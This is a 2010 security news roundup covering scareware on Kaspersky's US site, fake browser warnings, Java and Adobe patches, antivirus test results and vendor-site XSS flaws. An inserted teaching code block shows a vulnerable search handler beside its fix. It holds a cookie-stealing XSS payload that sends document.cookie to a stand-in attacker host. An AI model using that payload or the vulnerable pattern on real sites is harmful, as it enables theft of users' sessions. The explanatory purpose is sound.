
NEWS - October 21, 2010

Hacked Kaspersky server deploys scareware

Last Sunday, for a period of almost four hours, the US site of anti-virus vendor Kaspersky (kasperskyusa.com) deployed scareware on visitors' computers. When asked about the incident by the media, Kaspersky confirmed that it was indeed attacked. Users trying to download anti-virus products were redirected to an external page which pretended to perform a virus scan in a bogus "Windows Explorer" browser window. The page also tried to simulate an infection and scare visitors into downloading a program.

Kaspersky said that it took its server off-line shortly after being informed about the intrusion. However, in the forums, users reported that Kaspersky initially denied the incident and considered it the result of phishing attacks on users who had followed specially crafted links. It's unknown how many users downloaded and installed the scareware.

The criminals apparently managed to compromise the site via a vulnerable server component. Kaspersky said that the hole has since been fixed and that the restored servers are back in operation. The vendor reportedly audited all the servers in the domain. Kaspersky also said that no customer details were stolen in the attack.

http://www.h-online.com/security/news/item/Hacked-Kaspersky-server-deploys-scareware-1110984.html

Also :
Hacked Kaspersky Download Site Directs Users to Fake Antivirus

Hacked Kaspersky Website Infected Users with Scareware

'Attack Page' Scam Lurks in Firefox and Chrome

A new malware campaign takes advantage of the "malicious site" warnings commonly displayed by both Firefox and Chrome to trick unsuspecting users into downloading a rogue antivirus application, the security firm F-Secure reported today.

The attack happens when Web surfers visit a page offering "SecurityTool," a known malware application that purports to be antivirus software. On both Firefox and Chrome, a fake warning page then pops up that mimics the messages those browsers normally give users who visit suspect sites.

On Firefox, the warning alert is titled, "Reported Attack Page!" while on Chrome the page reads, "Warning: Visiting this site may harm your computer!" Both such warnings invite users to "Download Updates."

Users who click the download button then end up with a file called "ff_secure_upd.exe" on Firefox or "chrome_secure_upd.exe" on Google's browser; either way, what they really get is the rogue antivirus file and an invitation to pay a license fee for supposed protection.

Firefox users with scripts enabled, in fact, don't even have to click the "Download Updates" button - rather, they'll just be prompted to click "OK" to download "Firefox secure updates." Clicking "Cancel" only results in a repeated warning that updates need to be downloaded, F-Secure reported.

In addition to the "scareware," a hidden iFrame that's also part of the attack loads a Phoenix exploit kit from a different site, the security researcher noted, thereby exposing users to further exploitation.

A Fake "Just Updated"

This latest attack is very similar to one uncovered in July, through which SecurityTool used a similar technique purportedly prompting Firefox users to update their Adobe Flash Player.

In that case, the attack presented users with a fake version of the Firefox "Just Updated" page, which is typically shown when users open the browser for the first time after an update is downloaded. On the fake version, however, the message warned that Adobe Flash Player hadn't yet been updated, and it prompted the user to download a file that is in fact the rogue antivirus software, according to F-Secure.

http://www.pcworld.com/businesscenter/article/208305/attack_page_scam_lurks_in_firefox_and_chrome.html

From F-Secure with screenshots : Reported Attack Site! - Security Tool's Latest Trick

Also : Hackers subvert Firefox security warnings to sling scareware

Apple Ships Java Patches, Says It May Drop Java From Future OS X Releases

The more surprising news than the big patch release, though, was Apple's announcement that it has deprecated its Java implementation in OS X, meaning that it may well not include Java in future versions of the OS.

"As of the release of Java for Mac OS X 10.6 Update 3, the version of Java that is ported by Apple, and that ships with Mac OS X, is deprecated," the company said in the notes for the OS X updates released Wednesday.

"This means that the Apple-produced runtime will not be maintained at the same level, and may be removed from future versions of Mac OS X. The Java runtime shipping in Mac OS X 10.6 Snow Leopard, and Mac OS X 10.5 Leopard, will continue to be supported and maintained through the standard support cycles of those products."

Java has become a favorite target of attackers and Java bugs have become such a problem that Microsoft recently issued a warning about the extent of the Java security issues. The company's Malware Protection Center researched the relative number of exploits targeting various widely deployed technologies.

http://threatpost.com/en_us/blogs/apple-ships-java-patches-says-it-may-drop-java-future-os-x-releases-102110
What Adobe's New PDF Sandbox Really Means For Attackers

Adobe Reader X's 'Protected Mode' will make PDF attacks tougher to execute, but it can't stop every threat

It has been a busy year for Adobe security, issuing multiple patches for zero-day flaws and attacks aimed at its software as attacks on its pervasive Reader application have exploded. Now comes the official announcement of its expected Protected Mode sandboxing feature in the new Adobe Reader Version X. [...]

Adobe's Protected Mode is aimed at stopping attackers from installing malware, recruiting bots, and conducting any malicious activity on a Reader user's machine, Adobe's Arkin says. "The initial implementation of sandboxing is going to restrict the ability of Reader to process on a Windows machine and perform any write calls to the OS -- creating, changing, or deleting a filesystem file, kicking off new process, starting a new app, or tampering with a registry," he says.

An upcoming version of the feature will stop "read" calls from a PDF as well, so an attacker can't read or access file systems, he says.

"We're hoping that [PDF] attacks will [now] be more difficult to carry out and will be less reliable," Arkin says. "Our goal [with sandboxing] was to defend against all potential vulnerabilities that may still be latent in the code and that we haven't found and fixed yet. We want to make attacks the bad guys are trying to do more expensive."

Reader's sandbox does not, however, protect against phishing or social engineering-based lures. "The sandbox does nothing against attacks where you have text inside a PDF that tells you to visit this URL and you submit your credentials [there]," Arkin says.

It can't protect a user from a malicious link embedded in a sandboxed PDF, either. "When you click on it, depending on how you have your settings, you will get a dialog box that asks if you want to open [the link]," Arkin says. If you do, he says, you might be attacked with malicious code.

Nor can it save you from a poorly configured password for your PDF. "A sandbox has nothing to do with the security of the file itself if the wrong person is able to open it," he says. "And if you're using keys to do signatures or other cryptographic operations on PDFs, maybe you need to protect how you store those keys."

And like any software, a sandbox can be broken, says security expert Lucas Lundgren.

http://www.darkreading.com/insiderthreat/security/app-security/showArticle.jhtml?articleID=227900423

False Positives: When Antivirus Goes Wrong

The Anti-Malware Testing Standards Organization (AMTSO) is currently meeting to discuss, among other things, adoption of guidelines for testing the False Positive (FP) rate for antivirus programs. A False Positive occurs when the antivirus utility erroneously wipes out a file that is not malicious. Protection against viruses is essential, but when that protection backfires it can cause huge problems.

The Worst False Positives

All FPs are not created equal. If the antivirus deletes a brand-new download you can usually mark the file as trusted and try again. But if it deletes an essential system component, which happened to some McAfee users this past April, it can bring down the whole computer.

An antivirus that erroneously wipes out a file present on just 10 computers worldwide hasn't caused as much trouble as one that kills off a file present on 10 million computers. Clearly testers should account for both factors when evaluating a product for false positives, but how do you find out a given file's prevalence? [...]

An Informative Experiment

At AMTSO's request, Austrian test lab AV-Comparatives.org conducted a fairly simple experiment earlier this year, inviting every vendor member of AMTSO to participate. Those who joined the experiment were asked to research and report on the importance and prevalence of 11 specific non-malicious files and how long it took to obtain the necessary information.

Seven vendors chose to participate (anonymously) and the lab also evaluated results obtained directly from four "cloud" detection components. Vendors reported needing from 20 minutes to 5-6 hours for gathering the information, suggesting that most have no automatic technique for obtaining both prevalence and importance data. And just imagine how long it would take for a tester to determine this information for 500 or more samples.

The results were surprisingly varied. In several cases all of the vendors correctly identified the sample's prevalence, but in just as many cases only two of the seven did so. And for more than half the samples none of the vendors turned in a correct importance rating. Neither were the cloud results consistently correct, and of course the cloud reveals nothing about a file's importance.

http://www.pcmag.com/article2/0,2817,2371197,00.asp

Google releases Chrome 7.0 stable

Nearly seven weeks after the arrival of Chrome 6 on its second birthday, Google has released version 7 of Chrome into the web browser's stable channel. The update includes hundreds of bug fixes, an updated HTML5 parser, support for directory upload and an HTML5 File API, which allows for web-based content to read files stored locally on a user's system. Full AppleScript support has also been added for Mac OS X UI automation, as well as a new options window for managing cookies.

The update, which moves the full version number up to 7.0.517.41, also addresses a total of 11 security vulnerabilities in the WebKit-based browser, including one that Google rates as critical and five high-risk issues. Google says that the critical issue can cause the browser to crash due to an issue with form autofill. The high-risk bugs range from other form-related crashes, to URL spoofing, memory corruption and elements issues. The fifth high-risk problem reportedly causes the sandbox worker processes to fail on Linux systems.

http://www.h-online.com/security/news/item/Google-releases-Chrome-7-0-stable-1110978.html

Also See Vulnerabilities & Fixes : Google Chrome Multiple Vulnerabilities

Posing as Stuxnet removal tool to "remove" hard disk's data

Stuxnet, the first Trojan exploiting the Windows shortcut vulnerability, has recently been spreading in the wild. A series of experts' analysis documents as well as many forum topics on Stuxnet have shown the critical level of this worm. Anxiety has made users search for Stuxnet removal tools on the Internet. However, besides some good tools provided by Microsoft, some antivirus companies or the IT community, there are many fraudulent ones. They are created to spread malicious code on a large scale.

Recently, our ******** system has detected a particularly dangerous counterfeit tool: instead of cleaning Stuxnet, it will clean everything in your drive C.

http://blog.bkis.com/en/posing-as-stuxnet-removal-tool-to-remove-hard-disk-data/

FaceTime for Mac opens giant Apple ID security hole

FaceTime for Mac was released yesterday with an apparently slack-jawed, if not exactly gaping, security hole. Macworld Germany has noted that once a user has logged into FaceTime for Mac with his or her Apple ID, the password on the account can be changed from FaceTime without knowledge of the old password, leaving the account ripe for the picking by any passersby of the physical computer.

The sabotage of an Apple ID is as easy as navigating through FaceTime's preferences menu to the "View Account" page. Once there, whoever happens to be sitting at the computer can change the associated account password.

As long as the password satisfies all the security rules, the change instantly applies across the Apple ID account. For example, changing the password in FaceTime and subsequently accessing the iTunes Store will result in a prompt from iTunes to re-enter your password, and the old one will not work.

Signing out of FaceTime won't help, either; the program saves your password to the field, and there's no way to opt out of password memory. FaceTime will not let users delete the only e-mail address associated with the account, so if you've already signed up, you're kind of stuck.

If your account is hijacked, the worst-case scenario is your tormentor going on an iTunes Store shopping spree on your dime. If you're wise to the password change, you can flip the password back just as easily.

http://arstechnica.com/apple/news/2010/10/facetime-for-mac-opens-giant-apple-id-security-hole.ars

Pill Gangs Besmirch LegitScript Founder

Individuals who normally promote unlicensed, fly-by-night Internet pharmacies recently registered hundreds of hardcore porn and bestiality Web sites using contact information for the founder of a company that has helped to shutter more than 10,000 of these Internet pill mills over the past year, KrebsOnSecurity.com has learned.

The reputation attack is the latest sortie in an increasingly high-profile and high-stakes battle among spammers, online pill purveyors and those trying to shed light on their activities. Around the same time that these fake domains were registered, KrebsOnSecurity.com came under a sustained denial of service attack that traced back to Russian pill gangs.

In the third week of September, hundreds of domains were registered using the name, phone number and former business address of John Horton, founder of LegitScript, an Internet pharmacy verification service. The domains, many containing the word "adult," all redirect to a handful of porn and bestiality sites (a partial list is available here, but please tread lightly with these sites because they are definitely not safe for work and may not be safe for your PC).

http://krebsonsecurity.com/2010/10/pill-gangs-besmirch-legitscript-founder/

Tests show consumer antivirus programs falling behind

The latest tests of consumer antivirus software released on Tuesday show the products are declining in performance as the number of malicious software programs increases, a trend that does not bode well for consumers.

NSS Labs tested 11 consumer security suites and found that the products are less effective than a year ago as far as blocking the download and execution of malicious software programs. The company also tested if those programs detected and blocked malicious Web sites.

In its tests, the company used new malicious Web sites within minutes of discovery in addition to brand-new malware, which it contends is indicative of the conditions that users would find while browsing the Internet.

The download and execution blocking rate for the top performing product, Trend Micro's Titanium Maximum Security, fell from 96.4 percent to 90.1 percent from the third quarter of 2009 to the same period this year.

Coming in at number two was McAfee's Internet Security at 85.2 percent, followed by F-Secure Internet Security 2010, 80.4 percent; Norman Security Suite, 77.2 percent; Sunbelt VIPRE Antivirus Premium 4, 75.3 percent; Microsoft Security Essentials 2, 75 percent; Panda Internet Security 2011, 73.1 percent; Symantec Norton Internet Security 2010, 72.3 percent; Kaspersky Internet Security 2011, 71.3 percent; Eset Smart Security 4, 60 percent; and AVG's Internet Security 9, 54.8 percent.

All of the rates were lower except for two products: McAfee's Internet Security and F-Secure's Internet Security 2010, which upped their detection and blocking rates by 3.6 percent and .4 percent respectively. The biggest drop occurred for AVG's Internet Security 9, which fell 18.5 percent, and Kaspersky's Internet Security 2011, which fell 16.5 percent, according to NSS Labs.

"Perhaps surprisingly, Microsoft Security Essentials -- a free product -- ranked higher than half of the competition (paid products), including Symantec's market leading product," according to the report.

http://www.computerworld.com/s/article/9191718/Tests_show_consumer_antivirus_programs_falling_behind

And Yet Even More World of Warcraft Account Phishing

Today I received yet another World of Warcraft account phish. I have been getting these in an increased volume lately and have seen some fakes that are quite good. This one came to my hotmail account and looked very bland: [Screenshot: WoW Account Phish]

Bland but convincing enough. It essentially says that an account name change has been requested and would I kindly confirm the change by logging into the provided link: [Screenshot: Fake BattleNet Account Page]

Had I actually logged into this page my account details would have been stolen but how can a typical user know this? In truth they cannot (which is why your basic cybercriminal does it of course) unless they are using the right technologies to protect themselves and know what to look for. I did some digging and found VERY quickly that this site was not what it seemed. First of all the actual address is incorrect (BattleNet's real address is battle.net) and it is marked Green by our SiteAdvisor technology:

Continued @ McAfee Labs

Rogueware Targets Russians With Pay via SMS Scam

We've monitored the Rogueware threat landscape for quite some time over here at PandaLabs. Every day we see new domain names, product names, and various fake scan HTML templates. The Rogueware threat landscape hardly ever changes in a significant way, but today we came across something interesting. As you may know, most (if not all) of these threats are created in Eastern European countries such as Ukraine and Russia. This pretty much means that the cyber criminals will not deliberately try to infect users in those countries. In fact, some older Rogueware samples were programmed to quit after detecting the Russian keyboard layout. Well, until now that is...

Today we came across a Rogueware site completely constructed in Russian. The site claims to protect computers and social networking profiles against spam, phishing, viruses, and hacking attempts.

Here is what the site looks like: [Screenshot: Russian Rogueware Page]

Here is a Google translate version of the page:
[Screenshot: Russian Rogueware - Google Translate]

After clicking on the download button, we see several features that we can subscribe to (all checked by default). We are then presented with a brief fake scan, followed by a prompt asking us to select our geographic location (Russia by default). Once one of four mobile providers is selected, a special premium SMS number appears with instructions on retrieving the product activation code. The cost for the SMS activation is 300 Rubles, or just about $10 USD.

Continued @ the PandaLabs Blog

Researcher Develops Small Device to Intercept, Modify Electronic Payments

With bank fraud and attacks against financial institutions and online banking applications having turned into an epidemic, researchers, banks and other concerned parties have been looking for new ways to protect the integrity of financial transactions. A researcher at the University of Cambridge working on the problem has developed a new device that can act as a trusted intermediary to ensure the validity of electronic transactions.

The device, called the Smart Card Detective, is a small, card-sized piece of equipment that, among other things, can be used to verify that the amount shown on a terminal screen is actually the amount of money that is debited from a user's account. The device's creator, Omar Chaudary, said in an interview that he set out to create something that could serve just that main function of being a trusted terminal for electronic transactions, but soon figured out that the SCD could be used for any number of other tasks as well.

"The main idea was to protect users against card-reader attacks that display a lower amount on the terminal than it debits the account for," said Chaudary, who developed the SCD as part of his graduate work at Cambridge. "I wanted to do a device that intercepted the communications between the card and the terminal, so you have a trusted display. Then I realized it's a general-purpose device that can do anything that the EMV protocol can do."

http://threatpost.com/en_us/blogs/researcher-develops-small-device-intercept-modify-electronic-payments-102110
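An added example, not code from the Smart Card Detective project, of the check Chaudary describes. In EMV the card's CDOL1 tells the terminal which data objects to concatenate into the GENERATE AC command, so a device sitting between card and terminal can use CDOL1 to locate Amount, Authorised (tag 9F02, twelve BCD digits in minor currency units) in that command and show it on its own display before the card signs anything. The CDOL1 and command bytes below are constructed sample values, not a capture, and the two-decimal display assumes a currency exponent of 2.

```javascript
// Added example, not code from the Smart Card Detective project: locate the
// amount a terminal is asking a card to authorise so it can be shown on a
// display the cardholder trusts. CDOL1 and command bytes are constructed samples.

const hex = (s) => Buffer.from(s.replace(/\s+/g, ""), "hex");

// EMV tag for Amount, Authorised (Numeric): 6 bytes of packed BCD (n12).
const TAG_AMOUNT_AUTHORISED = 0x9f02;

// Parse a Data Object List: tag + one-byte length pairs with no values.
// A tag is two bytes when the low five bits of its first byte are all set
// (EMV Book 3, Annex B); otherwise it is one byte.
function parseDol(buf) {
  const entries = [];
  let i = 0;
  while (i < buf.length) {
    let tag = buf[i++];
    if ((tag & 0x1f) === 0x1f) {
      if (i >= buf.length) throw new Error("truncated two-byte tag in DOL");
      tag = (tag << 8) | buf[i++];
    }
    if (i >= buf.length) throw new Error("DOL entry missing length byte");
    entries.push({ tag, len: buf[i++] });
  }
  return entries;
}

// Split the concatenated GENERATE AC command data into fields using the
// DOL layout the card asked for. The lengths must account for every byte.
function splitByDol(dol, data) {
  const fields = new Map();
  let off = 0;
  for (const { tag, len } of dol) {
    if (off + len > data.length) throw new Error("command data shorter than CDOL1");
    fields.set(tag, data.subarray(off, off + len));
    off += len;
  }
  if (off !== data.length) throw new Error("trailing bytes after CDOL1 fields");
  return fields;
}

// Decode packed BCD to an integer; rejects nibbles above 9.
function bcdToInt(buf) {
  let v = 0;
  for (const b of buf) {
    const hi = b >> 4, lo = b & 0x0f;
    if (hi > 9 || lo > 9) throw new Error("invalid BCD digit");
    v = v * 100 + hi * 10 + lo;
  }
  return v;
}

// Amount (minor currency units) carried in a GENERATE AC command, given the
// card's CDOL1. Throws if 9F02 is absent or has the wrong length.
function amountFromGenerateAc(cdol1Hex, cmdDataHex) {
  const fields = splitByDol(parseDol(hex(cdol1Hex)), hex(cmdDataHex));
  const raw = fields.get(TAG_AMOUNT_AUTHORISED);
  if (!raw || raw.length !== 6) throw new Error("9F02 missing or wrong length");
  return bcdToInt(raw);
}

// The trusted-display check: compare what the terminal sends to the card
// with the amount the cardholder was shown and agreed to.
function verifyTransaction(cdol1Hex, cmdDataHex, displayedMinorUnits) {
  const authorised = amountFromGenerateAc(cdol1Hex, cmdDataHex);
  return { authorised, displayed: displayedMinorUnits, ok: authorised === displayedMinorUnits };
}

// Constructed CDOL1: 9F02(6) 9F03(6) 9F1A(2) 95(5) 5F2A(2) 9A(3) 9C(1) 9F37(4)
const SAMPLE_CDOL1 = "9F0206 9F0306 9F1A02 9505 5F2A02 9A03 9C01 9F3704";

// Constructed command data laid out to match SAMPLE_CDOL1 (29 bytes).
const SAMPLE_CMD_DATA = [
  "000000001000", // 9F02 Amount, Authorised: 1000 minor units
  "000000000000", // 9F03 Amount, Other (cashback): none
  "0826",         // 9F1A Terminal Country Code
  "0000000000",   // 95   Terminal Verification Results
  "0826",         // 5F2A Transaction Currency Code
  "101021",       // 9A   Transaction Date, YYMMDD
  "00",           // 9C   Transaction Type: purchase
  "12345678",     // 9F37 Unpredictable Number
].join("");

if (typeof require !== "undefined" && require.main === module) {
  // Cardholder was shown 10.00 (exponent 2 assumed); terminal asks for 1000 minor units.
  const result = verifyTransaction(SAMPLE_CDOL1, SAMPLE_CMD_DATA, 1000);
  console.log(`card will authorise ${(result.authorised / 100).toFixed(2)}, match: ${result.ok}`);
}
```

In a real interception the CDOL1 is read from the card's records earlier in the session (tag 8C), and the same DOL parser serves the PDOL that governs GET PROCESSING OPTIONS. The point of the check is that the card, not the terminal screen, is the authority on what will be debited, so the amount has to be read from the bytes headed for the card.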
Facebook Sues Accused Spammers in New Lawsuits

Facebook announced it filed three separate lawsuits against spammers this week.

The lawsuits, filed in federal court in San Jose, accuse Steven Richter, Jason Swan, and Max Bounty Inc. of violating the Computer Fraud and Abuse Act, the CAN-SPAM Act and other state and federal laws. Facebook is seeking compensatory, statutory and punitive damages from each.

"According to our complaints, the defendants, among other things, represented that in order to qualify for certain fake or deceptive offers, people had to spam their friends, sign up for automatic mobile phone subscription services, or provide other information," according to Facebook. "We claim that by doing this, they violated the U.S. Computer Fraud and Abuse Act, the Controlling the Assault of Non-Solicited Pornography and Marketing Act (CAN-SPAM), and other state and federal laws."

Facebook has taken spammers to court in the past. In 2008, the company won a massive judgment against Adam Guerbuez and Atlantis Blue Capital totaling $873 million. In addition, Facebook won a $711 million judgment last year against Sanford Wallace.

http://www.eweek.com/c/a/Security/Facebook-Sues-Accused-Spammers-in-New-Lawsuits-262282/

Also: Updates in Facebook's Fight Against Spam and Spammers

Killing the zombie cookie

The permanent evercookie presented around four weeks ago is apparently easier to kill than previously thought. The supercookie was presented by Samy Kamkar as a JavaScript API that combines several techniques to store information on a user's PC to create a cookie zombie that is hard to get rid of. HTML5 in particular adds a lot of places to store various data in a browser. With such a cookie in place, web servers can more effectively detect whether a visitor has already been to a web page.

But it's apparently possible, with just a few steps, to delete the distributed information stored by the evercookie, although unfortunately there is no practical user interface to do so. For instance, Jeremiah Grossmann, a browser security specialist, has published directions on how to erase the information in Google's Chrome browser. Under Windows, any Silverlight and Flash cookies must be deleted along with all Internet data (by selecting - Wrench, Tools, Clear Browsing Data).

Dominic White has also published instructions for Firefox. For Safari on Macs, he has even written a short script that deletes the evercookie. However, in his experiments he ran into problems with the mobile version of Safari on the Apple iPhone, where every app uses its own storage for cookies, the cache and HTML5 data.

http://www.h-online.com/security/news/item/Killing-the-zombie-cookie-1123151.html

Prior Posting : The Cookies You Can't Remove

Facebook games maker sued in privacy flap

A developer of some of Facebook's most popular games has been hit by a federal lawsuit alleging it shared millions of Facebook user IDs with advertisers and data brokers.

The lawsuit alleges that Zynga, maker of six of the top 10 Facebook games, collected and shared the IDs of 218 million users, in violation of federal law and terms of service. It seeks unspecified monetary damages and an injunction preventing the alleged practice from continuing. The suit was filed in US District Court in San Francisco on behalf of Nancy Graf of St. Paul, Minnesota. It seeks class action status so other Facebook users may also be represented.

The action follows an investigation by The Wall Street Journal that found that a large number of Facebook apps, including all of the top 10, transmitted the unique user IDs of those who ran them to outside companies. Zynga, maker of games such as Farmville, Mafia Wars, and Cafe World, was found to be "transmitting personal information about a user's friends to outside companies," the paper reported.

It remains debatable just how damaging the practice is to user privacy.

http://www.theregister.co.uk/2010/10/20/facebook_games_maker_sued/

Panda Security releases Mac app

Panda Security has announced Panda Antivirus for Mac. In doing so, the company must answer the same question faced by every other security vendor trying to sell in this market: Do Macs really need protecting?

After all, we still haven't seen any widespread outbreaks of Mac malware - even though it's just as technically feasible to attack the Mac as it is to target Windows. The question is: Will that change?

Not surprisingly, Panda says it will. The company claims to know of 5,000 strains of malware that specifically affect Apple systems. And it says that number will increase: The company predicts that when Mac market share hits 15% (it's now around 10%), Macs will be "massively targeted by hackers."

In the meantime, there are already cross-platform macro viruses, phishing scams, and scareware that can harm Macs as well as Windows PCs. And even if you or your Mac aren't specifically threatened, you can still act as a vector by unknowingly passing along malware targeting other platforms via e-mail.

http://www.macworld.com/article/155041/2010/10/pandasecurityformac.html

Also : Panda Antivirus debuts for the Mac
Panda Security Press Release : Panda Security Launches Panda Antivirus for Mac
Site is loaded for SEO bear

"Be careful if you're looking for live coverage of the Chile mine rescue"

Alert reader Marco tipped us off about this one: a web site loaded with 10 landing pages used to poison search results for the Chile mine rescue story. The real agenda was to scam you into installing a rogue security product. Any of the links will redirect your browser to a download site in the familiar co.cc domain. [Screenshot]

These are the URLs. Notice the variations on the theme of "Chile", "mine" and "rescue." [Screenshot]

Clicking on any of the above results in a Firefox browser gets you this: [Screenshot]

It's the "update-your-Firefox-browser" scam, although the page didn't wait for you to click any buttons; it started itself.

That's detected as VirTool.Win32.Obfuscator.hg!b1 (v), which is commonly used to download other malcode (like maybe a rogue -- see below).

As a side note, we were running the latest version of Firefox, just released today: version 3.6.11:

Continued @ the Sunbelt Blog

Mozilla releases Firefox & Thunderbird security updates

Mozilla has released updates for the Firefox web browser and for the Thunderbird news and email client, closing a number of critical security vulnerabilities in those open source products. The latest security and stability update to the 3.6.x branch of Firefox addresses a total of 9 security issues, including five that Mozilla lists as critical, two high-level bugs and one rated as moderate.

Critical Firefox bugs include a library loading bug, a location bar (aka the Awesome Bar) property problem, a buffer overflow and memory corruption error when using document.write, a dangling pointer problem and various memory safety hazards, most of which could possibly lead to the execution of remote code. The Mozilla development team have also released Firefox 3.5.14 to address the same vulnerabilities.

http://www.h-online.com/security/news/item/Mozilla-releases-Firefox-Thunderbird-security-updates-1110898.html

See Mozilla Entries In: Vulnerabilities & Fixes
Critical RealPlayer Update

Real Networks Inc. has released a new version of RealPlayer that fixes at least seven critical vulnerabilities that could be used to compromise host systems remotely if left unpatched.

I've never hidden my distaste for this program, mainly due to its history of unnecessarily tracking users, installing oodles of third party software, and serving obnoxious pop-ups. But I realize that many people keep this software installed because a handful of sites still only offer streaming in the RealPlayer format. If you or someone you look after has this program installed, please update it.

The new versions listed in the chart below are not vulnerable to these flaws. Real Networks says it has no evidence that attackers are exploiting any of these flaws yet. The latest versions for all operating systems are available here. [Screenshot: New Versions]

http://krebsonsecurity.com/2010/10/critical-realplayer-update/

XSS Vulnerabilities Discovered on Eset, Panda and Symantec

A group of white-hat hackers named Team Elite has discovered XSS (cross-site scripting) flaws of different degrees of seriousness on the online sites belonging to Panda Security, Symantec and ESET. The group notified each of the 3 companies about the problem in order that they may sanitize their websites at the earliest.

Team Elite states that these flaws are capable of causing dangerous and severe phishing attacks. According to it, XSS vulnerabilities are a result of inappropriate activity during coding, which may generate malware such as scripts, worms and other malicious programs that clandestinely enter computers to proliferate bogus e-mails. Essentially, these flaws fuel phishing assaults, the hackers' group notes. Spywared published this on October 5, 2010.

A member of Team Elite elaborated that XSS flaws posed a high risk and attackers exploiting them could capture sensitive information like account login details as well as other credentials. He emphasized that his team didn't execute this kind of activity and they didn't invade any website. They, rather, produced proof-of-concept and created widespread awareness about existing flaws in order that the affected firms could fix the problems for their own benefit, the member stated. Net-security published this on October 4, 2010.

http://www.spamfighter.com/News-15230-XSS-Vulnerabilities-Discovered-on-Eset-Panda-and-Symantec.htm
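As an added example (not code from the reports, and not taken from any of the three vendors' sites), the defect class Team Elite describes, in its minimal form: a search handler that reflects its query parameter into HTML without encoding, beside the same handler with output encoding applied. The function names, the payload and the attacker.example host are constructed for illustration.

```javascript
// Added example: a reflected XSS defect of the kind reported against the
// vendor sites above, next to the output-encoding fix. Function names, the
// payload and attacker.example are constructed for illustration.

// Vulnerable: the search term is dropped into the markup unchanged, so a
// value that closes the attribute and opens a <script> tag becomes page code.
function renderSearchVulnerable(query) {
  return `<p>Results for: ${query}</p>` +
         `<input type="text" name="q" value="${query}">`;
}

// Encode the five characters that change meaning in HTML text content and
// in double-quoted attribute values.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Fixed: every interpolation goes through the encoder, and attribute values
// stay double-quoted so the browser never parses an unquoted attribute.
function renderSearchSafe(query) {
  const q = escapeHtml(query);
  return `<p>Results for: ${q}</p>` +
         `<input type="text" name="q" value="${q}">`;
}

// Constructed payload in the style of a cookie-stealing XSS: break out of the
// value="..." attribute, then request a remote image whose URL carries document.cookie.
const XSS_PAYLOAD =
  `"><script>new Image().src="http://attacker.example/c?"+document.cookie</script>`;

// Demonstration check: does the rendered HTML contain a live <script> tag,
// i.e. did the input escape its text or attribute context?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(containsScriptTag(renderSearchVulnerable(XSS_PAYLOAD))); // true
  console.log(containsScriptTag(renderSearchSafe(XSS_PAYLOAD)));       // false
  console.log(renderSearchSafe(XSS_PAYLOAD));
}
```

The fix is encoding at the point of output, chosen for the context the data lands in: this encoder is correct for HTML text and quoted attribute values, but data written into a JavaScript string, a URL or a CSS value needs that context's encoder instead. Filtering input for "bad" strings on its own does not close the hole, because the same value is safe in one context and code in another.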

Attack Code Published for Adobe Shockwave Zero Day

A security researcher has released an exploit for an unpatched security vulnerability in Adobe's Shockwave Player, warning that the flaw could be targeted to launch drive-by malware download attacks.

Adobe has issued a security advisory to confirm the vulnerability and warn that the public attack code could provide a roadmap for malicious hackers to take complete control of a vulnerable computer.

Adobe rates the issue as "critical" and says the vulnerability affects Shockwave Player 11.5.8.612 and earlier versions for Windows and Mac OS X.

'A critical vulnerability exists in Adobe Shockwave Player 11.5.8.612 and earlier versions on the Windows and Macintosh operating systems. This vulnerability (CVE-2010-3653) could cause a crash and potentially allow an attacker to take control of the affected system. While details about the vulnerability have been disclosed publicly, Adobe is not aware of any attacks exploiting this vulnerability at this time.'

Adobe did not say when a patch would be made available.

http://threatpost.com/en_us/blogs/attack-code-published-adobe-shockwave-zero-day-102110

Also : Adobe Shockwave bitten by code execution bug
See Vulnerabilities & Fixes : Adobe Shockwave Player Memory Corruption Vulnerability
